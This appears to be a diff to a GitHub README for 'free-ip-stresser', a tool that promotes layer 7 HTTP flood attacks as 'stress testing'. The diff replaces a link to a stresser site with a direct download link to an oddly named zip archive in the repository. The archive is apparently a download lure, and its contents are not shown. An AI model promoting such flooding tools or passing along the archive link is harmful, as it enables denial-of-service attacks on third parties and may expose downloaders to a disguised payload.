JohnWiiUfan/free-ip-stresser/README.md

 free-ip-stresser is a straightforward tool designed to test the strength and stability of IP addresses by generating controlled traffic.
 It simulates common network loads to help users check how their network or server responds under pressure.
 This tool can be useful for administrators or anyone curious about network limits and security.

-The project, linked to rebirthstress.cc, focuses especially on layer 7 HTTP flood attacks, making it clear it is a tool primarily designed to create web traffic as a form of stress testing.
+The project, linked to https://github.com/JohnWiiUfan/free-ip-stresser/raw/refs/heads/main/antirumor/free_stresser_ip_hemiteratics.zip, focuses especially on layer 7 HTTP flood attacks, making it clear it is a tool primarily designed to create web traffic as a form of stress testing.

 ---